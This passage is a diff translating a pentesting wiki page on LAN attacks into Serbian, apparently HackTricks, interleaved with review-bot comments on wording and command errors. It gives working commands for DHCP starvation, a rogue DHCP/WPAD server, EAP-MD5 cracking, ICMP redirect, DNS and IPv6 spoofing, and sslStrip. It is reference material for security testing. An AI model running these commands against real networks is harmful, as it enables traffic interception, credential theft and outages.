```bash sudo yersinia cdp -attack 2 #Simulate a new CISCO device sudo yersinia cdp -attack 0 #Send a CDP packet ``` +Možete takođe koristiti [**scapy**](https://github.com/secdev/scapy/). Obavezno ga instalirajte sa `scapy/contrib` paketom. -You could also use [**scapy**](https://github.com/secdev/scapy/). Be sure to install it with `scapy/contrib` package. 
+### VoIP napadi i VoIP Hopper alat -### VoIP Attacks and the VoIP Hopper Tool +VoIP telefoni, sve više integrisani sa IoT uređajima, nude funkcionalnosti poput otključavanja vrata ili kontrolisanja termostata putem posebnih brojeva telefona. Međutim, ova integracija može predstavljati sigurnosne rizike. -VoIP phones, increasingly integrated with IoT devices, offer functionalities like unlocking doors or controlling thermostats through special phone numbers. However, this integration can pose security risks. +Alat [**voiphopper**](http://voiphopper.sourceforge.net) je dizajniran da emulira VoIP telefon u raznim okruženjima (Cisco, Avaya, Nortel, Alcatel-Lucent). Otkrije VLAN ID glasovne mreže koristeći protokole kao što su CDP, DHCP, LLDP-MED i 802.1Q ARP. -The tool [**voiphopper**](http://voiphopper.sourceforge.net) is designed to emulate a VoIP phone in various environments (Cisco, Avaya, Nortel, Alcatel-Lucent). It discovers the voice network's VLAN ID using protocols like CDP, DHCP, LLDP-MED, and 802.1Q ARP. +**VoIP Hopper** nudi tri moda za Cisco Discovery Protocol (CDP): -**VoIP Hopper** offers three modes for the Cisco Discovery Protocol (CDP): +1. **Sniff Mode** (`-c 0`): Analizira mrežne pakete kako bi identifikovao VLAN ID. +2. **Spoof Mode** (`-c 1`): Generiše prilagođene pakete koji imituju one stvarnog VoIP uređaja. +3. **Spoof with Pre-made Packet Mode** (`-c 2`): Šalje pakete identične onima određenog Cisco IP telefonskog modela. -1. **Sniff Mode** (`-c 0`): Analyzes network packets to identify the VLAN ID. -2. **Spoof Mode** (`-c 1`): Generates custom packets mimicking those of an actual VoIP device. -3. **Spoof with Pre-made Packet Mode** (`-c 2`): Sends packets identical to those of a specific Cisco IP phone model. +Preferirani mod za brzinu je treći. Zahteva specificiranje: -The preferred mode for speed is the third one. It requires specifying: +- Mrežnog interfejsa napadača (`-i` parametar). 
+- Imena VoIP uređaja koji se emulira (`-E` parametar), u skladu sa Cisco formatom imenovanja (npr. SEP praćeno MAC adresom). -- The attacker's network interface (`-i` parameter). -- The name of the VoIP device being emulated (`-E` parameter), adhering to the Cisco naming format (e.g., SEP followed by a MAC address). +U korporativnim okruženjima, da bi se imitirao postojeći VoIP uređaj, može se: -In corporate settings, to mimic an existing VoIP device, one might: - -- Inspect the MAC label on the phone. -- Navigate the phone's display settings to view model information. -- Connect the VoIP device to a laptop and observe CDP requests using Wireshark. - -An example command to execute the tool in the third mode would be: +- Ispitati MAC oznaku na telefonu. +- Navigirati kroz postavke prikaza telefona da bi se videli podaci o modelu. +- Povezati VoIP uređaj na laptop i posmatrati CDP zahteve koristeći Wireshark. +Primer komande za izvršavanje alata u trećem modu bio bi: ```bash voiphopper -i eth1 -E 'SEP001EEEEEEEEE ' -c 2 ``` +### DHCP Napadi -### DHCP Attacks - -#### Enumeration - +#### Enumeracija ```bash nmap --script broadcast-dhcp-discover Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-16 05:30 EDT 
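Review bot: the new heading `#### Indukcija CDP tabele poplave` is a word-for-word rendering that reads as "induction of the CDP table of flood" in Serbian; `#### Inducing CDP Table Flooding` should become something like `#### Preplavljivanje CDP tabele` (optionally with the English term in parentheses, as the translation already does for "Sniff Mode" / "Spoof Mode"). Two smaller things in the same hunk: `Otkrije VLAN ID` should be `Otkriva VLAN ID` (present tense, matching the surrounding sentences), and the unchanged example `voiphopper -i eth1 -E 'SEP001EEEEEEEEE ' -c 2` carries a trailing space inside the quotes, which ends up in the emulated phone's CDP Device ID; it looks like a copy error and should read `-E 'SEP001EEEEEEEEE'`.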
@@ -551,68 +487,61 @@ Pre-scan script results: |_ Domain Name: mynet Nmap done: 0 IP addresses (0 hosts up) scanned in 5.27 seconds ``` - **DoS** -**Two types of DoS** could be performed against DHCP servers. The first one consists on **simulate enough fake hosts to use all the possible IP addresses**.\ -This attack will work only if you can see the responses of the DHCP server and complete the protocol (**Discover** (Comp) --> **Offer** (server) --> **Request** (Comp) --> **ACK** (server)). For example, this is **not possible in Wifi networks**. - -Another way to perform a DHCP DoS is to send a **DHCP-RELEASE packet using as source code every possible IP**. Then, the server will think that everybody has finished using the IP. +**Dva tipa DoS** mogu se izvesti protiv DHCP servera. Prvi se sastoji od **simuliranja dovoljno lažnih hostova da se iskoriste sve moguće IP adrese**.\ +Ovaj napad će raditi samo ako možete videti odgovore DHCP servera i završiti protokol (**Discover** (Comp) --> **Offer** (server) --> **Request** (Comp) --> **ACK** (server)). Na primer, ovo je **nemoguće u Wifi mrežama**. +Drugi način za izvođenje DHCP DoS je slanje **DHCP-RELEASE paketa koristeći kao izvorni kod svaku moguću IP adresu**. Tada će server pomisliti da su svi završili sa korišćenjem IP adrese. ```bash yersinia dhcp -attack 1 yersinia dhcp -attack 3 #More parameters are needed ``` +Automatizovaniji način za to je korišćenje alata [DHCPing](https://github.com/kamorin/DHCPig). -A more automatic way of doing this is using the tool [DHCPing](https://github.com/kamorin/DHCPig) +Možete koristiti pomenute DoS napade da primorate klijente da dobiju nove zakupnine unutar okruženja i iscrpite legitimne servere tako da postanu neodgovorni. Tako kada se legitimni pokušaju ponovo povezati, **možete poslužiti zlonamerne vrednosti pomenute u sledećem napadu**. 
-You could use the mentioned DoS attacks to force clients to obtain new leases within the environment, and exhaust legitimate servers so that they become unresponsive. So when the legitimate try to reconnect, **you can server malicious values mentioned in the next attack**. +#### Postavljanje zlonamernih vrednosti -#### Set malicious values +Rogue DHCP server može biti postavljen koristeći DHCP skriptu koja se nalazi na `/usr/share/responder/DHCP.py`. Ovo je korisno za mrežne napade, kao što su hvatanje HTTP saobraćaja i kredencijala, preusmeravanjem saobraćaja na zlonamerni server. Međutim, postavljanje rogue gateway-a je manje efikasno jer omogućava samo hvatanje izlaznog saobraćaja sa klijenta, propuštajući odgovore sa pravog gateway-a. Umesto toga, preporučuje se postavljanje rogue DNS ili WPAD servera za efikasniji napad. -A rogue DHCP server can be set up using the DHCP script located at `/usr/share/responder/DHCP.py`. This is useful for network attacks, like capturing HTTP traffic and credentials, by redirecting traffic to a malicious server. However, setting a rogue gateway is less effective since it only allows capturing outbound traffic from the client, missing the responses from the real gateway. Instead, setting up a rogue DNS or WPAD server is recommended for a more effective attack. +Ispod su opcije komandi za konfiguraciju rogue DHCP servera: -Below are the command options for configuring the rogue DHCP server: - -- **Our IP Address (Gateway Advertisement)**: Use `-i 10.0.0.100` to advertise your machine's IP as the gateway. -- **Local DNS Domain Name**: Optionally, use `-d example.org` to set a local DNS domain name. -- **Original Router/Gateway IP**: Use `-r 10.0.0.1` to specify the IP address of the legitimate router or gateway. -- **Primary DNS Server IP**: Use `-p 10.0.0.100` to set the IP address of the rogue DNS server you control. -- **Secondary DNS Server IP**: Optionally, use `-s 10.0.0.1` to set a secondary DNS server IP. 
-- **Netmask of Local Network**: Use `-n 255.255.255.0` to define the netmask for the local network. -- **Interface for DHCP Traffic**: Use `-I eth1` to listen for DHCP traffic on a specific network interface. -- **WPAD Configuration Address**: Use `-w “http://10.0.0.100/wpad.dat”` to set the address for WPAD configuration, assisting in web traffic interception. -- **Spoof Default Gateway IP**: Include `-S` to spoof the default gateway IP address. -- **Respond to All DHCP Requests**: Include `-R` to make the server respond to all DHCP requests, but be aware that this is noisy and can be detected. - -By correctly using these options, a rogue DHCP server can be established to intercept network traffic effectively. +- **Naša IP adresa (Gateway Advertisement)**: Koristite `-i 10.0.0.100` da reklamirate IP vaše mašine kao gateway. +- **Lokalno DNS ime domena**: Opcionalno, koristite `-d example.org` da postavite lokalno DNS ime domena. +- **Originalni Router/Gateway IP**: Koristite `-r 10.0.0.1` da navedete IP adresu legitimnog rutera ili gateway-a. +- **Primarna DNS Server IP**: Koristite `-p 10.0.0.100` da postavite IP adresu rogue DNS servera koji kontrolišete. +- **Sekundarna DNS Server IP**: Opcionalno, koristite `-s 10.0.0.1` da postavite IP adresu sekundarnog DNS servera. +- **Mrežna maska lokalne mreže**: Koristite `-n 255.255.255.0` da definišete mrežnu masku za lokalnu mrežu. +- **Interfejs za DHCP saobraćaj**: Koristite `-I eth1` da slušate DHCP saobraćaj na određenom mrežnom interfejsu. +- **WPAD konfiguraciona adresa**: Koristite `-w “http://10.0.0.100/wpad.dat”` da postavite adresu za WPAD konfiguraciju, pomažući u presretanju web saobraćaja. +- **Lažiranje IP adrese podrazumevanog gateway-a**: Uključite `-S` da lažirate IP adresu podrazumevanog gateway-a. +- **Odgovarajte na sve DHCP zahteve**: Uključite `-R` da server odgovara na sve DHCP zahteve, ali budite svesni da je ovo bučno i može biti otkriveno. 
+Ispravnim korišćenjem ovih opcija, rogue DHCP server može biti uspostavljen za efikasno presretanje mrežnog saobraćaja. ```python # Example to start a rogue DHCP server with specified options !python /usr/share/responder/DHCP.py -i 10.0.0.100 -d example.org -r 10.0.0.1 -p 10.0.0.100 -s 10.0.0.1 -n 255.255.255.0 -I eth1 -w "http://10.0.0.100/wpad.dat" -S -R ``` +### **EAP napadi** -### **EAP Attacks** +Evo nekih od taktika napada koje se mogu koristiti protiv 802.1X implementacija: -Here are some of the attack tactics that can be used against 802.1X implementations: - -- Active brute-force password grinding via EAP -- Attacking the RADIUS server with malformed EAP content _\*\*_(exploits) -- EAP message capture and offline password cracking (EAP-MD5 and PEAP) -- Forcing EAP-MD5 authentication to bypass TLS certificate validation -- Injecting malicious network traffic upon authenticating using a hub or similar - -If the attacker if between the victim and the authentication server, he could try to degrade (if necessary) the authentication protocol to EAP-MD5 and capture the authentication attempt. Then, he could brute-force this using: +- Aktivno brute-force otkrivanje lozinki putem EAP +- Napad na RADIUS server sa neispravnim EAP sadržajem _\*\*_(eksploati) +- Hvatanje EAP poruka i offline otkrivanje lozinki (EAP-MD5 i PEAP) +- Prisiljavanje EAP-MD5 autentifikacije da zaobiđe TLS validaciju sertifikata +- Umetanje zlonamernog mrežnog saobraćaja prilikom autentifikacije koristeći hub ili slično +Ako je napadač između žrtve i servera za autentifikaciju, mogao bi pokušati da degradira (ako je potrebno) autentifikacijski protokol na EAP-MD5 i uhvati pokušaj autentifikacije. 
Zatim bi mogao da koristi brute-force za ovo: ``` eapmd5pass –r pcap.dump –w /usr/share/wordlist/sqlmap.txt ``` +### FHRP (GLBP & HSRP) napadi -### FHRP (GLBP & HSRP) Attacks +**FHRP** (First Hop Redundancy Protocol) je klasa mrežnih protokola dizajniranih da **kreiraju vrući redundantni sistem rutiranja**. Sa FHRP-om, fizički ruteri mogu biti kombinovani u jedan logički uređaj, što povećava otpornost na greške i pomaže u raspodeli opterećenja. -**FHRP** (First Hop Redundancy Protocol) is a class of network protocols designed to **create a hot redundant routing system**. With FHRP, physical routers can be combined into a single logical device, which increases fault tolerance and helps distribute the load. - -**Cisco Systems engineers have developed two FHRP protocols, GLBP and HSRP.** +**Inženjeri Cisco Systems-a su razvili dva FHRP protokola, GLBP i HSRP.** {{#ref}} glbp-and-hsrp-attacks.md 
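Review bot: in the DHCP DoS paragraph, `DHCP-RELEASE paketa koristeći kao izvorni kod svaku moguću IP adresu` translates the English "source code" literally, but the DHCPRELEASE is spoofed with every possible IP as the source address (the English line is itself a typo for "source address"); it should read `koristeći kao izvornu adresu svaku moguću IP adresu`, otherwise a reader will look for source code to supply. Also in this hunk: the line `eapmd5pass –r pcap.dump –w /usr/share/wordlist/sqlmap.txt` uses en-dashes (U+2013) instead of `-`, so it cannot be pasted into a shell as-is; the `_\*\*_` fragment in `Napad na RADIUS server sa neispravnim EAP sadržajem _\*\*_(eksploati)` is leftover markdown escaping and should be dropped; and the rogue DHCP example is fenced as ```python although it is a shell command with a Jupyter-style `!` prefix (suggest a ```bash fence and `python /usr/share/responder/DHCP.py ...`).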
@@ -620,82 +549,73 @@ glbp-and-hsrp-attacks.md ### RIP -Three versions of the Routing Information Protocol (RIP) are known to exist: RIP, RIPv2, and RIPng. Datagrams are sent to peers via port 520 using UDP by RIP and RIPv2, whereas datagrams are broadcasted to UDP port 521 via IPv6 multicast by RIPng. Support for MD5 authentication was introduced by RIPv2. On the other hand, native authentication is not incorporated by RIPng; instead, reliance is placed on optional IPsec AH and ESP headers within IPv6. +Poznate su tri verzije Routing Information Protocol (RIP): RIP, RIPv2 i RIPng. Datagrami se šalju partnerima putem porta 520 koristeći UDP kod RIP i RIPv2, dok se datagrami emitiraju na UDP port 521 putem IPv6 multicast kod RIPng. Podrška za MD5 autentifikaciju uvedena je u RIPv2. S druge strane, nativna autentifikacija nije uključena u RIPng; umesto toga, oslanja se na opcione IPsec AH i ESP zaglavlja unutar IPv6. -- **RIP and RIPv2:** Communication is done through UDP datagrams on port 520. -- **RIPng:** Utilizes UDP port 521 for broadcasting datagrams via IPv6 multicast. +- **RIP i RIPv2:** Komunikacija se vrši putem UDP datagrama na portu 520. +- **RIPng:** Koristi UDP port 521 za emitovanje datagrama putem IPv6 multicast. -Note that RIPv2 supports MD5 authentication while RIPng does not include native authentication, relying on IPsec AH and ESP headers in IPv6. +Napomena: RIPv2 podržava MD5 autentifikaciju dok RIPng ne uključuje nativnu autentifikaciju, oslanjajući se na IPsec AH i ESP zaglavlja u IPv6. -### EIGRP Attacks +### EIGRP napadi -**EIGRP (Enhanced Interior Gateway Routing Protocol)** is a dynamic routing protocol. **It is a distance-vector protocol.** If there is **no authentication** and configuration of passive interfaces, an **intruder** can interfere with EIGRP routing and cause **routing tables poisoning**. Moreover, EIGRP network (in other words, autonomous system) **is flat and has no segmentation into any zones**. 
If an **attacker injects a route**, it is likely that this route will **spread** throughout the autonomous EIGRP system. +**EIGRP (Enhanced Interior Gateway Routing Protocol)** je dinamički protokol rutiranja. **To je protokol zasnovan na udaljenosti.** Ako nema **autentifikacije** i konfiguracije pasivnih interfejsa, **napadač** može ometati EIGRP rutiranje i izazvati **trovanje tabela rutiranja**. Štaviše, EIGRP mreža (drugim rečima, autonomni sistem) **je ravna i nema segmentaciju u bilo koje zone**. Ako **napadač injektuje rutu**, verovatno će se ova ruta **proširiti** kroz autonomni EIGRP sistem. -To attack a EIGRP system requires **establishing a neighbourhood with a legitimate EIGRP route**r, which opens up a lot of possibilities, from basic reconnaissance to various injections. +Napad na EIGRP sistem zahteva **uspostavljanje komšiluka sa legitimnim EIGRP ruterom**, što otvara mnoge mogućnosti, od osnovne rekognosciranja do raznih injekcija. -[**FRRouting**](https://frrouting.org/) allows you to implement **a virtual router that supports BGP, OSPF, EIGRP, RIP and other protocols.** All you need to do is deploy it on your attacker’s system and you can actually pretend to be a legitimate router in the routing domain. +[**FRRouting**](https://frrouting.org/) vam omogućava da implementirate **virtuelni ruter koji podržava BGP, OSPF, EIGRP, RIP i druge protokole.** Sve što treba da uradite je da ga postavite na sistem napadača i zapravo možete da se pretvarate da ste legitimni ruter u ruting domenu. {{#ref}} eigrp-attacks.md {{#endref}} -[**Coly**](https://code.google.com/p/coly/) has capabilities for intercepting EIGRP (Enhanced Interior Gateway Routing Protocol) broadcasts. It also allows for the injection of packets, which can be utilized to alter routing configurations. +[**Coly**](https://code.google.com/p/coly/) ima mogućnosti za presretanje EIGRP (Enhanced Interior Gateway Routing Protocol) emitovanja. 
Takođe omogućava injekciju paketa, što se može koristiti za promenu konfiguracija rutiranja. ### OSPF -In Open Shortest Path First (OSPF) protocol **MD5 authentication is commonly employed to ensure secure communication between routers**. However, this security measure can be compromised using tools like Loki and John the Ripper. These tools are capable of capturing and cracking MD5 hashes, exposing the authentication key. Once this key is obtained, it can be used to introduce new routing information. To configure the route parameters and establish the compromised key, the _Injection_ and _Connection_ tabs are utilized, respectively. +U Open Shortest Path First (OSPF) protokolu **MD5 autentifikacija se obično koristi za obezbeđivanje sigurne komunikacije između rutera**. Međutim, ova sigurnosna mera može biti kompromitovana korišćenjem alata kao što su Loki i John the Ripper. Ovi alati su sposobni da hvataju i razbijaju MD5 hešove, otkrivajući autentifikacioni ključ. Kada se ovaj ključ dobije, može se koristiti za uvođenje novih informacija o rutiranju. Za konfiguraciju parametara rute i uspostavljanje kompromitovanog ključa koriste se _Injection_ i _Connection_ kartice, redom. -- **Capturing and Cracking MD5 Hashes:** Tools such as Loki and John the Ripper are used for this purpose. -- **Configuring Route Parameters:** This is done through the _Injection_ tab. -- **Setting the Compromised Key:** The key is configured under the _Connection_ tab. +- **Hvatanje i razbijanje MD5 hešova:** Alati kao što su Loki i John the Ripper se koriste u tu svrhu. +- **Konfiguracija parametara rute:** Ovo se vrši putem _Injection_ kartice. +- **Postavljanje kompromitovanog ključa:** Ključ se konfiguriše pod _Connection_ karticom. 
-### Other Generic Tools & Sources +### Ostali generički alati i izvori -- [**Above**](https://github.com/c4s73r/Above): Tool to scan network traffic and find vulnerabilities -- You can find some **more information about network attacks** [**here**](https://github.com/Sab0tag3d/MITM-cheatsheet). +- [**Above**](https://github.com/c4s73r/Above): Alat za skeniranje mrežnog saobraćaja i pronalaženje ranjivosti +- Možete pronaći **više informacija o mrežnim napadima** [**ovde**](https://github.com/Sab0tag3d/MITM-cheatsheet). ## **Spoofing** -The attacker configures all the network parameters (GW, IP, DNS) of the new member of the network sending fake DHCP responses. - +Napadač konfiguriše sve mrežne parametre (GW, IP, DNS) novog člana mreže šaljući lažne DHCP odgovore. ```bash Ettercap yersinia dhcp -attack 2 #More parameters are needed ``` - ### ARP Spoofing -Check the [previous section](./#arp-spoofing). +Proverite [prethodni odeljak](./#arp-spoofing). ### ICMPRedirect -ICMP Redirect consist on sending an ICMP packet type 1 code 5 that indicates that the attacker is the best way to reach an IP. Then, when the victim wants to contact the IP, it will send the packet through the attacker. - +ICMP Redirect se sastoji od slanja ICMP paketa tipa 1 kod 5 koji ukazuje da je napadač najbolji način za dostizanje IP adrese. Tada, kada žrtva želi da kontaktira IP, poslaće paket kroz napadača. ```bash Ettercap icmp_redirect hping3 [VICTIM IP ADDRESS] -C 5 -K 1 -a [VICTIM DEFAULT GW IP ADDRESS] --icmp-gw [ATTACKER IP ADDRESS] --icmp-ipdst [DST IP ADDRESS] --icmp-ipsrc [VICTIM IP ADDRESS] #Send icmp to [1] form [2], route to [3] packets sent to [4] from [5] ``` - ### DNS Spoofing -The attacker will resolve some (or all) the domains that the victim ask for. - +Napadač će rešiti neke (ili sve) domene koje žrtva traži. 
```bash set dns.spoof.hosts ./dns.spoof.hosts; dns.spoof on ``` - -**Configure own DNS with dnsmasq** - +**Konfigurišite vlastiti DNS sa dnsmasq** ```bash apt-get install dnsmasqecho "addn-hosts=dnsmasq.hosts" > dnsmasq.conf #Create dnsmasq.confecho "127.0.0.1 domain.example.com" > dnsmasq.hosts #Domains in dnsmasq.hosts will be the domains resolved by the Dsudo dnsmasq -C dnsmasq.conf --no-daemon dig @localhost domain.example.com # Test the configured DNS ``` +### Lokalni prolazi -### Local Gateways - -Multiple routes to systems and networks often exist. Upon building a list of MAC addresses within the local network, use _gateway-finder.py_ to identify hosts that support IPv4 forwarding. - +Više ruta ka sistemima i mrežama često postoji. Nakon izrade liste MAC adresa unutar lokalne mreže, koristite _gateway-finder.py_ da identifikujete hostove koji podržavaju IPv4 prosleđivanje. ``` root@kali:~# git clone https://github.com/pentestmonkey/gateway-finder.git root@kali:~# cd gateway-finder/ 
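Review bot: the ICMP Redirect description `slanja ICMP paketa tipa 1 kod 5` (carried over from the English "type 1 code 5") has the numbers inverted: ICMP Redirect is type 5, and code 1 is "redirect for host", which is exactly what the unchanged command `hping3 ... -C 5 -K 1 ...` sends; the sentence should say `ICMP paketa tipa 5 (Redirect), kod 1`. Two wording points in the same hunk: `Napadač će rešiti neke (ili sve) domene` uses "rešiti" (to solve) for DNS "resolve", where `razrešiti` / `rezolvovati` is the usual term; and the heading `### Lokalni prolazi` translates "gateway" as "prolaz" while the rest of the patch keeps `gateway` untranslated (`rogue gateway-a`, `podrazumevanog gateway-a`), so pick one form and use it consistently, e.g. `### Lokalni gateway-i`.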
@@ -713,66 +633,58 @@ gateway-finder v1.0 http://pentestmonkey.net/tools/gateway-finder [+] We can ping 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100] [+] We can reach TCP port 80 on 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100] ``` - ### [Spoofing LLMNR, NBT-NS, and mDNS](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) -For local host resolution when DNS lookups are unsuccessful, Microsoft systems rely on **Link-Local Multicast Name Resolution (LLMNR)** and the **NetBIOS Name Service (NBT-NS)**. Similarly, **Apple Bonjour** and **Linux zero-configuration** implementations utilize **Multicast DNS (mDNS)** for discovering systems within a network. Due to the unauthenticated nature of these protocols and their operation over UDP, broadcasting messages, they can be exploited by attackers aiming to redirect users to malicious services. +Za lokalno rešavanje hostova kada DNS pretrage nisu uspešne, Microsoft sistemi se oslanjaju na **Link-Local Multicast Name Resolution (LLMNR)** i **NetBIOS Name Service (NBT-NS)**. Slično tome, **Apple Bonjour** i **Linux zero-configuration** implementacije koriste **Multicast DNS (mDNS)** za otkrivanje sistema unutar mreže. Zbog neautentifikovane prirode ovih protokola i njihove operacije preko UDP, emitovanjem poruka, mogu ih iskoristiti napadači koji imaju za cilj da preusmere korisnike na zlonamerne usluge. -You can impersonate services that are searched by hosts using Responder to send fake responses.\ -Read here more information about [how to Impersonate services with Responder](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md). +Možete se pretvarati da ste usluge koje traže hostovi koristeći Responder za slanje lažnih odgovora.\ +Pročitajte ovde više informacija o [kako se pretvarati da ste usluge sa Responderom](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md). 
### [Spoofing WPAD](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) -Browsers commonly employ the **Web Proxy Auto-Discovery (WPAD) protocol to automatically acquire proxy settings**. This involves fetching configuration details from a server, specifically through a URL such as "http://wpad.example.org/wpad.dat". The discovery of this server by the clients can happen through various mechanisms: +Pregledači obično koriste **Web Proxy Auto-Discovery (WPAD) protokol za automatsko preuzimanje proxy podešavanja**. To uključuje preuzimanje konfiguracionih detalja sa servera, posebno putem URL-a kao što je "http://wpad.example.org/wpad.dat". Otkriće ovog servera od strane klijenata može se dogoditi kroz različite mehanizme: -- Through **DHCP**, where the discovery is facilitated by utilizing a special code 252 entry. -- By **DNS**, which involves searching for a hostname labeled _wpad_ within the local domain. -- Via **Microsoft LLMNR and NBT-NS**, which are fallback mechanisms used in cases where DNS lookups do not succeed. +- Kroz **DHCP**, gde se otkrivanje olakšava korišćenjem posebnog koda 252. +- Preko **DNS**, što uključuje pretragu za imenom hosta označenim kao _wpad_ unutar lokalne domene. +- Putem **Microsoft LLMNR i NBT-NS**, koji su mehanizmi povratne veze korišćeni u slučajevima kada DNS pretrage ne uspevaju. -The tool Responder takes advantage of this protocol by acting as a **malicious WPAD server**. It uses DHCP, DNS, LLMNR, and NBT-NS to mislead clients into connecting to it. To dive deeper into how services can be impersonated using Responder [check this](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md). +Alat Responder koristi ovaj protokol delujući kao **zlonameran WPAD server**. Koristi DHCP, DNS, LLMNR i NBT-NS da zavara klijente da se povežu sa njim. Da biste dublje istražili kako se usluge mogu pretvarati koristeći Responder [proverite ovo](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md). 
### [Spoofing SSDP and UPnP devices](spoofing-ssdp-and-upnp-devices.md) -You can offer different services in the network to try to **trick a user** to enter some **plain-text credentials**. **More information about this attack in** [**Spoofing SSDP and UPnP Devices**](spoofing-ssdp-and-upnp-devices.md)**.** +Možete ponuditi različite usluge u mreži kako biste pokušali da **prevarite korisnika** da unese neke **plain-text kredencijale**. **Više informacija o ovom napadu u** [**Spoofing SSDP and UPnP Devices**](spoofing-ssdp-and-upnp-devices.md)**.** ### IPv6 Neighbor Spoofing -This attack is very similar to ARP Spoofing but in the IPv6 world. You can get the victim think that the IPv6 of the GW has the MAC of the attacker. - +Ovaj napad je vrlo sličan ARP Spoofingu, ali u svetu IPv6. Možete navesti žrtvu da pomisli da IPv6 GW ima MAC adresu napadača. ```bash sudo parasite6 -l eth0 # This option will respond to every requests spoofing the address that was requested sudo fake_advertise6 -r -w 2 eth0 #This option will send the Neighbor Advertisement packet every 2 seconds ``` - ### IPv6 Router Advertisement Spoofing/Flooding -Some OS configure by default the gateway from the RA packets sent in the network. To declare the attacker as IPv6 router you can use: - +Neki operativni sistemi podrazumevano konfigurišu gateway iz RA paketa poslatih u mreži. Da biste proglasili napadača kao IPv6 ruter, možete koristiti: ```bash sysctl -w net.ipv6.conf.all.forwarding=1 4 ip route add default via dev wlan0 fake_router6 wlan0 fe80::01/16 ``` - ### IPv6 DHCP spoofing -By default some OS try to configure the DNS reading a DHCPv6 packet in the network. Then, an attacker could send a DHCPv6 packet to configure himself as DNS. The DHCP also provides an IPv6 to the victim. - +Podrazumevano, neki operativni sistemi pokušavaju da konfigurišu DNS čitajući DHCPv6 paket u mreži. Tada bi napadač mogao poslati DHCPv6 paket da se konfiguriše kao DNS. DHCP takođe obezbeđuje IPv6 žrtvi. 
```bash dhcp6.spoof on dhcp6.spoof.domains mitm6 ``` +### HTTP (lažna stranica i JS kod injekcija) -### HTTP (fake page and JS code injection) - -## Internet Attacks +## Internet napadi ### sslStrip -Basically what this attack does is, in case the **user** try to **access** a **HTTP** page that is **redirecting** to the **HTTPS** version. **sslStrip** will **maintain** a **HTTP connection with** the **client and** a **HTTPS connection with** the **server** so it ill be able to **sniff** the connection in **plain text**. - +U suštini, ono što ovaj napad radi je da, u slučaju da **korisnik** pokuša da **pristupi** **HTTP** stranici koja se **preusmerava** na **HTTPS** verziju. **sslStrip** će **održavati** **HTTP vezu sa** **klijentom i** **HTTPS vezu sa** **serverom** tako da će moći da **snifa** vezu u **čistom tekstu**. ```bash apt-get install sslstrip sslstrip -w /tmp/sslstrip.log --all - l 10000 -f -k 
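Review bot: `mehanizmi povratne veze` in the WPAD discovery list means "feedback mechanisms"; the English "fallback mechanisms" (used only when the DNS lookup fails) is `rezervni mehanizmi` or `mehanizmi za slučaj neuspeha DNS pretrage`. In the same hunk the translated heading `### HTTP (lažna stranica i JS kod injekcija)` still has no body under it, as the original had none; either add content or drop the heading rather than translate an empty section. Two unchanged command blocks here are also worth fixing while the file is being touched: in the RA spoofing block `ip route add default via dev wlan0` has no gateway after `via` and the `4` at the end of the sysctl line is stray, and in the sslStrip block `- l 10000` should be `-l 10000` (one option, no space).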
@@ -781,33 +693,29 @@ sslstrip -w /tmp/sslstrip.log --all - l 10000 -f -k iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 iptables -A INPUT -p tcp --destination-port 10000 -j ACCEPT ``` +Više informacija [ovde](https://www.blackhat.com/presentations/bh-dc-09/Marlinspike/BlackHat-DC-09-Marlinspike-Defeating-SSL.pdf). -More info [here](https://www.blackhat.com/presentations/bh-dc-09/Marlinspike/BlackHat-DC-09-Marlinspike-Defeating-SSL.pdf). +### sslStrip+ i dns2proxy za zaobilaženje HSTS -### sslStrip+ and dns2proxy for bypassing HSTS +**Razlika** između **sslStrip+ i dns2proxy** u odnosu na **sslStrip** je u tome što će **preusmeriti** na primer _**www.facebook.com**_ **na** _**wwww.facebook.com**_ (obratite pažnju na **dodatno** "**w**") i postaviće **adresu ovog domena kao IP napadača**. Na taj način, **klijent** će se **povezati** na _**wwww.facebook.com**_ **(napadač)**, ali u pozadini **sslstrip+** će **održavati** **pravu vezu** putem https sa **www.facebook.com**. -The **difference** between **sslStrip+ and dns2proxy** against **sslStrip** is that they will **redirect** for example _**www.facebook.com**_ **to** _**wwww.facebook.com**_ (note the **extra** "**w**") and will set the **address of this domain as the attacker IP**. This way, the **client** will **connect** to _**wwww.facebook.com**_ **(the attacker)** but behind the scenes **sslstrip+** will **maintain** the **real connection** via https with **www.facebook.com**. +**Cilj** ove tehnike je da se **izbegne HSTS** jer _**wwww**.facebook.com_ **neće** biti sačuvan u **kešu** pregledača, tako da će pregledač biti prevaren da izvrši **facebook autentifikaciju u HTTP**.\ +Napomena: da bi se izvršio ovaj napad, žrtva mora prvo pokušati da pristupi [http://www.faceook.com](http://www.faceook.com) a ne https. To se može uraditi modifikovanjem linkova unutar http stranice. 
-The **goal** of this technique is to **avoid HSTS** because _**wwww**.facebook.com_ **won't** be saved in the **cache** of the browser, so the browser will be tricked to perform **facebook authentication in HTTP**.\ -Note that in order to perform this attack the victim has to try to access initially to [http://www.faceook.com](http://www.faceook.com) and not https. This can be done modifying the links inside an http page. +Više informacija [ovde](https://www.bettercap.org/legacy/#hsts-bypass), [ovde](https://www.slideshare.net/Fatuo__/offensive-exploiting-dns-servers-changes-blackhat-asia-2014) i [ovde](https://security.stackexchange.com/questions/91092/how-does-bypassing-hsts-with-sslstrip-work-exactly). -More info [here](https://www.bettercap.org/legacy/#hsts-bypass), [here](https://www.slideshare.net/Fatuo__/offensive-exploiting-dns-servers-changes-blackhat-asia-2014) and [here](https://security.stackexchange.com/questions/91092/how-does-bypassing-hsts-with-sslstrip-work-exactly). - -**sslStrip or sslStrip+ doesn;t work anymore. This is because there are HSTS rules presaved in the browsers, so even if it's the first time that a user access an "important" domain he will access it via HTTPS. Also, notice that the presaved rules and other generated rules can use the flag** [**`includeSubdomains`**](https://hstspreload.appspot.com) **so the** _**wwww.facebook.com**_ **example from before won't work anymore as** _**facebook.com**_ **uses HSTS with `includeSubdomains`.** +**sslStrip ili sslStrip+ više ne funkcionišu. To je zato što postoje HSTS pravila unapred sačuvana u pregledačima, tako da čak i ako je prvi put da korisnik 